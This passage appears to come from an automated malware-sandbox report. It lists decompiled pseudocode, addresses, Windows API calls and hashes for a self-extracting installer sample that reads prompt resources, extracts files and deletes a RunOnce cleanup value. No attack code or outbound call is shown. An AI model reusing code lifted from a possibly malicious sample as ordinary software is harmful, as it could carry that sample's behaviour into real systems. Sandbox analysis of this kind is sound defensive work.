                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x00a63fef
                                                                                                                                                                                                      0x00a63ffa
                                                                                                                                                                                                      0x00a64001
                                                                                                                                                                                                      0x00a64008
                                                                                                                                                                                                      0x00a6400a
                                                                                                                                                                                                      0x00a6400b
                                                                                                                                                                                                      0x00a64010
                                                                                                                                                                                                      0x00a6410a
                                                                                                                                                                                                      0x00a6411a
                                                                                                                                                                                                      0x00a6411a
                                                                                                                                                                                                      0x00a6401c
                                                                                                                                                                                                      0x00a6401d
                                                                                                                                                                                                      0x00a6401e
                                                                                                                                                                                                      0x00a6401f
                                                                                                                                                                                                      0x00a64033
                                                                                                                                                                                                      0x00a6403b
                                                                                                                                                                                                      0x00a640ca
                                                                                                                                                                                                      0x00a640e9
                                                                                                                                                                                                      0x00a640f8
                                                                                                                                                                                                      0x00a64101
                                                                                                                                                                                                      0x00a64106
                                                                                                                                                                                                      0x00a64106
                                                                                                                                                                                                      0x00a64108
                                                                                                                                                                                                      0x00a64108
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64108
                                                                                                                                                                                                      0x00a64049
                                                                                                                                                                                                      0x00a6405c
                                                                                                                                                                                                      0x00a64062
                                                                                                                                                                                                      0x00a64068
                                                                                                                                                                                                      0x00a6406e
                                                                                                                                                                                                      0x00a64070
                                                                                                                                                                                                      0x00a64077
                                                                                                                                                                                                      0x00a6407f
                                                                                                                                                                                                      0x00a64089
                                                                                                                                                                                                      0x00a6408b
                                                                                                                                                                                                      0x00a6408b
                                                                                                                                                                                                      0x00a64089
                                                                                                                                                                                                      0x00a64077
                                                                                                                                                                                                      0x00a64091
                                                                                                                                                                                                      0x00a6409c
                                                                                                                                                                                                      0x00a640a8
                                                                                                                                                                                                      0x00a640b8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a640c2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a640c2

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00A64033
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A64049
                                                                                                                                                                                                      • GetExitCodeProcess.KERNELBASE ref: 00A6405C
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00A6409C
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00A640A8
                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A640DC
                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A640E9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3183975587-0
                                                                                                                                                                                                      • Opcode ID: 8735c0539b1d46e0448f10ffed30d626af7a2f065044885a60b19a48663ee689
                                                                                                                                                                                                      • Instruction ID: 83544211def9188e66dfef8375650cf5d73dc0eac23f4b79c5085ea792fd510f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8735c0539b1d46e0448f10ffed30d626af7a2f065044885a60b19a48663ee689
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B031C531640218BBEB20DFA5DC4DFAB7B7CEBA9700F1002A9F515E21A1CA744D86CF51
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A651E5(void* __eflags) {
                                                                                                                                                                                                      				int _t5;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t1 = E00A6468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                      				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                      				if(_t28 != 0) {
                                                                                                                                                                                                      					if(E00A6468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                      						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                      						if(_t5 != 0) {
                                                                                                                                                                                                      							_t6 = E00A644B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                      							LocalFree(_t28);
                                                                                                                                                                                                      							if(_t6 != 6) {
                                                                                                                                                                                                      								 *0xa69124 = 0x800704c7;
                                                                                                                                                                                                      								L10:
                                                                                                                                                                                                      								return 0;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							 *0xa69124 = 0;
                                                                                                                                                                                                      							L6:
                                                                                                                                                                                                      							return 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						LocalFree(_t28);
                                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					E00A644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					LocalFree(_t28);
                                                                                                                                                                                                      					 *0xa69124 = 0x80070714;
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E00A644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      				 *0xa69124 = E00A66285();
                                                                                                                                                                                                      				goto L10;
                                                                                                                                                                                                      			}






                                                                                                                                                                                                      0x00a651fb
                                                                                                                                                                                                      0x00a65207
                                                                                                                                                                                                      0x00a6520b
                                                                                                                                                                                                      0x00a6523c
                                                                                                                                                                                                      0x00a65268
                                                                                                                                                                                                      0x00a65270
                                                                                                                                                                                                      0x00a6528b
                                                                                                                                                                                                      0x00a65293
                                                                                                                                                                                                      0x00a6529c
                                                                                                                                                                                                      0x00a652a6
                                                                                                                                                                                                      0x00a652b0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a652b0
                                                                                                                                                                                                      0x00a6529e
                                                                                                                                                                                                      0x00a65279
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6527b
                                                                                                                                                                                                      0x00a65273
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65273
                                                                                                                                                                                                      0x00a6524a
                                                                                                                                                                                                      0x00a65250
                                                                                                                                                                                                      0x00a65256
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65256
                                                                                                                                                                                                      0x00a65219
                                                                                                                                                                                                      0x00a65223
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646A0
                                                                                                                                                                                                        • Part of subcall function 00A6468F: SizeofResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646A9
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646C3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LoadResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646CC
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LockResource.KERNEL32(00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646D3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: memcpy_s.MSVCRT ref: 00A646E5
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A62F4D,?,00000002,00000000), ref: 00A65201
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A65250
                                                                                                                                                                                                        • Part of subcall function 00A644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A64518
                                                                                                                                                                                                        • Part of subcall function 00A644B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A64554
                                                                                                                                                                                                        • Part of subcall function 00A66285: GetLastError.KERNEL32(00A65BBC), ref: 00A66285
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$UPROMPT
                                                                                                                                                                                                      • API String ID: 957408736-2980973527
                                                                                                                                                                                                      • Opcode ID: fc134a25c64679ebd6dbb10288dcf541a823cb53a9f2b6522cb5ca7836b5cbf0
                                                                                                                                                                                                      • Instruction ID: 3090065142a453265503290ba6cf1d7350915bff12c7bd092ec1ba48ab200630
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc134a25c64679ebd6dbb10288dcf541a823cb53a9f2b6522cb5ca7836b5cbf0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA1104F1A00601BFE355ABB15D5AF7B65BEEB99384F104429F702E6290DFB98C024534
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A61FE1(void* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				if( *0xa68530 != 0) {
                                                                                                                                                                                                      					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                      					if(_t4 == 0) {
                                                                                                                                                                                                      						RegDeleteValueA(_v8, "wextract_cleanup3"); // executed
                                                                                                                                                                                                      						return RegCloseKey(_v8);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t4;
                                                                                                                                                                                                      			}





                                                                                                                                                                                                      0x00a61fee
                                                                                                                                                                                                      0x00a62005
                                                                                                                                                                                                      0x00a6200d
                                                                                                                                                                                                      0x00a62017
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62020
                                                                                                                                                                                                      0x00a6200d
                                                                                                                                                                                                      0x00a62029

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00A6538C,?,?,00A6538C), ref: 00A62005
                                                                                                                                                                                                      • RegDeleteValueA.KERNELBASE(00A6538C,wextract_cleanup3,?,?,00A6538C), ref: 00A62017
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00A6538C,?,?,00A6538C), ref: 00A62020
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup3
                                                                                                                                                                                                      • API String ID: 849931509-2968168367
                                                                                                                                                                                                      • Opcode ID: af18461bee53bb5df4077f0b03026099599d1a5542763d1c587417eafae11e15
                                                                                                                                                                                                      • Instruction ID: 70aaf9f4ee591d35df7d9c007c8c23835fcb7d922630cb3831ef461ce37e5d8c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: af18461bee53bb5df4077f0b03026099599d1a5542763d1c587417eafae11e15
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8E04F30655319BBD721CBD0EC0AF597B3DF710741F110295F906B0060EBA55E15DB05
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E00A64CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				long _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      				long _t35;
                                                                                                                                                                                                      				long _t36;
                                                                                                                                                                                                      				struct HWND__* _t37;
                                                                                                                                                                                                      				long _t38;
                                                                                                                                                                                                      				long _t39;
                                                                                                                                                                                                      				long _t41;
                                                                                                                                                                                                      				long _t44;
                                                                                                                                                                                                      				long _t45;
                                                                                                                                                                                                      				long _t46;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				long _t51;
                                                                                                                                                                                                      				char* _t58;
                                                                                                                                                                                                      				long _t59;
                                                                                                                                                                                                      				char* _t63;
                                                                                                                                                                                                      				long _t64;
                                                                                                                                                                                                      				CHAR* _t71;
                                                                                                                                                                                                      				CHAR* _t74;
                                                                                                                                                                                                      				int _t75;
                                                                                                                                                                                                      				signed int _t76;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t69 = __edx;
                                                                                                                                                                                                      				_t29 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                      				_v8 = _t30;
                                                                                                                                                                                                      				_t75 = _a8;
                                                                                                                                                                                                      				if( *0xa691d8 == 0) {
                                                                                                                                                                                                      					_t32 = _a4;
                                                                                                                                                                                                      					__eflags = _t32;
                                                                                                                                                                                                      					if(_t32 == 0) {
                                                                                                                                                                                                      						_t33 = E00A64E99(_t75);
                                                                                                                                                                                                      						L35:
                                                                                                                                                                                                      						return E00A66CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t35 = _t32 - 1;
                                                                                                                                                                                                      					__eflags = _t35;
                                                                                                                                                                                                      					if(_t35 == 0) {
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						_t33 = 0;
                                                                                                                                                                                                      						goto L35;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t36 = _t35 - 1;
                                                                                                                                                                                                      					__eflags = _t36;
                                                                                                                                                                                                      					if(_t36 == 0) {
                                                                                                                                                                                                      						_t37 =  *0xa68584; // 0x0
                                                                                                                                                                                                      						__eflags = _t37;
                                                                                                                                                                                                      						if(_t37 != 0) {
                                                                                                                                                                                                      							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t54 = 0xa691e4;
                                                                                                                                                                                                      						_t58 = 0xa691e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t38 =  *_t58;
                                                                                                                                                                                                      							_t58 =  &(_t58[1]);
                                                                                                                                                                                                      							__eflags = _t38;
                                                                                                                                                                                                      						} while (_t38 != 0);
                                                                                                                                                                                                      						_t59 = _t58 - 0xa691e5;
                                                                                                                                                                                                      						__eflags = _t59;
                                                                                                                                                                                                      						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                      						_t73 =  &(_t71[1]);
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t39 =  *_t71;
                                                                                                                                                                                                      							_t71 =  &(_t71[1]);
                                                                                                                                                                                                      							__eflags = _t39;
                                                                                                                                                                                                      						} while (_t39 != 0);
                                                                                                                                                                                                      						_t69 = _t71 - _t73;
                                                                                                                                                                                                      						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                      						__eflags = _t30 - 0x104;
                                                                                                                                                                                                      						if(_t30 >= 0x104) {
                                                                                                                                                                                                      							L3:
                                                                                                                                                                                                      							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                      							goto L35;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 = 0xa691e4;
                                                                                                                                                                                                      						_t30 = E00A64702( &_v268, 0xa691e4,  *(_t75 + 4));
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t41 = E00A6476D( &_v268, __eflags);
                                                                                                                                                                                                      						__eflags = _t41;
                                                                                                                                                                                                      						if(_t41 == 0) {
                                                                                                                                                                                                      							goto L9;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(0x180);
                                                                                                                                                                                                      						_t30 = E00A64980( &_v268, 0x8302); // executed
                                                                                                                                                                                                      						_t75 = _t30;
                                                                                                                                                                                                      						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                      						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = E00A647E0( &_v268);
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xa693f4 =  *0xa693f4 + 1;
                                                                                                                                                                                                      						_t33 = _t75;
                                                                                                                                                                                                      						goto L35;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t44 = _t36 - 1;
                                                                                                                                                                                                      					__eflags = _t44;
                                                                                                                                                                                                      					if(_t44 == 0) {
                                                                                                                                                                                                      						_t54 = 0xa691e4;
                                                                                                                                                                                                      						_t63 = 0xa691e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t45 =  *_t63;
                                                                                                                                                                                                      							_t63 =  &(_t63[1]);
                                                                                                                                                                                                      							__eflags = _t45;
                                                                                                                                                                                                      						} while (_t45 != 0);
                                                                                                                                                                                                      						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                      						_t64 = _t63 - 0xa691e5;
                                                                                                                                                                                                      						__eflags = _t64;
                                                                                                                                                                                                      						_t69 =  &(_t74[1]);
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t46 =  *_t74;
                                                                                                                                                                                                      							_t74 =  &(_t74[1]);
                                                                                                                                                                                                      							__eflags = _t46;
                                                                                                                                                                                                      						} while (_t46 != 0);
                                                                                                                                                                                                      						_t73 = _t74 - _t69;
                                                                                                                                                                                                      						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                      						__eflags = _t30 - 0x104;
                                                                                                                                                                                                      						if(_t30 >= 0x104) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 = 0xa691e4;
                                                                                                                                                                                                      						_t30 = E00A64702( &_v268, 0xa691e4,  *(_t75 + 4));
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                      						_t30 = E00A64C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						E00A64B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                      						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                      						__eflags = _t50;
                                                                                                                                                                                                      						if(_t50 != 0) {
                                                                                                                                                                                                      							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                      							__eflags = _t51;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t51 = 0x80;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t33 = 1;
                                                                                                                                                                                                      							goto L35;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t30 = _t44 - 1;
                                                                                                                                                                                                      					__eflags = _t30;
                                                                                                                                                                                                      					if(_t30 == 0) {
                                                                                                                                                                                                      						goto L3;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_a4 == 3) {
                                                                                                                                                                                                      					_t30 = E00A64B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L3;
                                                                                                                                                                                                      			}































                                                                                                                                                                                                      0x00a64cd0
                                                                                                                                                                                                      0x00a64cdb
                                                                                                                                                                                                      0x00a64ce0
                                                                                                                                                                                                      0x00a64ce2
                                                                                                                                                                                                      0x00a64cee
                                                                                                                                                                                                      0x00a64cf2
                                                                                                                                                                                                      0x00a64d0e
                                                                                                                                                                                                      0x00a64d0e
                                                                                                                                                                                                      0x00a64d11
                                                                                                                                                                                                      0x00a64e83
                                                                                                                                                                                                      0x00a64e88
                                                                                                                                                                                                      0x00a64e98
                                                                                                                                                                                                      0x00a64e98
                                                                                                                                                                                                      0x00a64d17
                                                                                                                                                                                                      0x00a64d17
                                                                                                                                                                                                      0x00a64d1a
                                                                                                                                                                                                      0x00a64d2f
                                                                                                                                                                                                      0x00a64d2f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64d2f
                                                                                                                                                                                                      0x00a64d1c
                                                                                                                                                                                                      0x00a64d1c
                                                                                                                                                                                                      0x00a64d1f
                                                                                                                                                                                                      0x00a64dcb
                                                                                                                                                                                                      0x00a64dd0
                                                                                                                                                                                                      0x00a64dd2
                                                                                                                                                                                                      0x00a64ddd
                                                                                                                                                                                                      0x00a64ddd
                                                                                                                                                                                                      0x00a64de3
                                                                                                                                                                                                      0x00a64de8
                                                                                                                                                                                                      0x00a64ded
                                                                                                                                                                                                      0x00a64ded
                                                                                                                                                                                                      0x00a64def
                                                                                                                                                                                                      0x00a64df0
                                                                                                                                                                                                      0x00a64df0
                                                                                                                                                                                                      0x00a64df4
                                                                                                                                                                                                      0x00a64df4
                                                                                                                                                                                                      0x00a64df6
                                                                                                                                                                                                      0x00a64df9
                                                                                                                                                                                                      0x00a64dfc
                                                                                                                                                                                                      0x00a64dfc
                                                                                                                                                                                                      0x00a64dfe
                                                                                                                                                                                                      0x00a64dff
                                                                                                                                                                                                      0x00a64dff
                                                                                                                                                                                                      0x00a64e03
                                                                                                                                                                                                      0x00a64e08
                                                                                                                                                                                                      0x00a64e0a
                                                                                                                                                                                                      0x00a64e0f
                                                                                                                                                                                                      0x00a64d03
                                                                                                                                                                                                      0x00a64d03
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64d03
                                                                                                                                                                                                      0x00a64e18
                                                                                                                                                                                                      0x00a64e20
                                                                                                                                                                                                      0x00a64e25
                                                                                                                                                                                                      0x00a64e27
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64e33
                                                                                                                                                                                                      0x00a64e38
                                                                                                                                                                                                      0x00a64e3a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64e40
                                                                                                                                                                                                      0x00a64e51
                                                                                                                                                                                                      0x00a64e56
                                                                                                                                                                                                      0x00a64e5b
                                                                                                                                                                                                      0x00a64e5e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64e6a
                                                                                                                                                                                                      0x00a64e6f
                                                                                                                                                                                                      0x00a64e71
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64e77
                                                                                                                                                                                                      0x00a64e7d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64e7d
                                                                                                                                                                                                      0x00a64d25
                                                                                                                                                                                                      0x00a64d25
                                                                                                                                                                                                      0x00a64d28
                                                                                                                                                                                                      0x00a64d36
                                                                                                                                                                                                      0x00a64d3b
                                                                                                                                                                                                      0x00a64d40
                                                                                                                                                                                                      0x00a64d40
                                                                                                                                                                                                      0x00a64d42
                                                                                                                                                                                                      0x00a64d43
                                                                                                                                                                                                      0x00a64d43
                                                                                                                                                                                                      0x00a64d47
                                                                                                                                                                                                      0x00a64d4a
                                                                                                                                                                                                      0x00a64d4a
                                                                                                                                                                                                      0x00a64d4c
                                                                                                                                                                                                      0x00a64d4f
                                                                                                                                                                                                      0x00a64d4f
                                                                                                                                                                                                      0x00a64d51
                                                                                                                                                                                                      0x00a64d52
                                                                                                                                                                                                      0x00a64d52
                                                                                                                                                                                                      0x00a64d56
                                                                                                                                                                                                      0x00a64d5b
                                                                                                                                                                                                      0x00a64d5d
                                                                                                                                                                                                      0x00a64d62
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64d67
                                                                                                                                                                                                      0x00a64d6f
                                                                                                                                                                                                      0x00a64d74
                                                                                                                                                                                                      0x00a64d76
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64d7c
                                                                                                                                                                                                      0x00a64d84
                                                                                                                                                                                                      0x00a64d89
                                                                                                                                                                                                      0x00a64d8b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64d94
                                                                                                                                                                                                      0x00a64d99
                                                                                                                                                                                                      0x00a64d9e
                                                                                                                                                                                                      0x00a64da1
                                                                                                                                                                                                      0x00a64daa
                                                                                                                                                                                                      0x00a64daa
                                                                                                                                                                                                      0x00a64da3
                                                                                                                                                                                                      0x00a64da3
                                                                                                                                                                                                      0x00a64da3
                                                                                                                                                                                                      0x00a64db5
                                                                                                                                                                                                      0x00a64dbb
                                                                                                                                                                                                      0x00a64dbd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64dc3
                                                                                                                                                                                                      0x00a64dc5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64dc5
                                                                                                                                                                                                      0x00a64dbd
                                                                                                                                                                                                      0x00a64d2a
                                                                                                                                                                                                      0x00a64d2a
                                                                                                                                                                                                      0x00a64d2d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64d2d
                                                                                                                                                                                                      0x00a64cf8
                                                                                                                                                                                                      0x00a64cfd
                                                                                                                                                                                                      0x00a64d02
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00A64DB5
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00A64DDD
                                                                                                                                                                                                      Strings
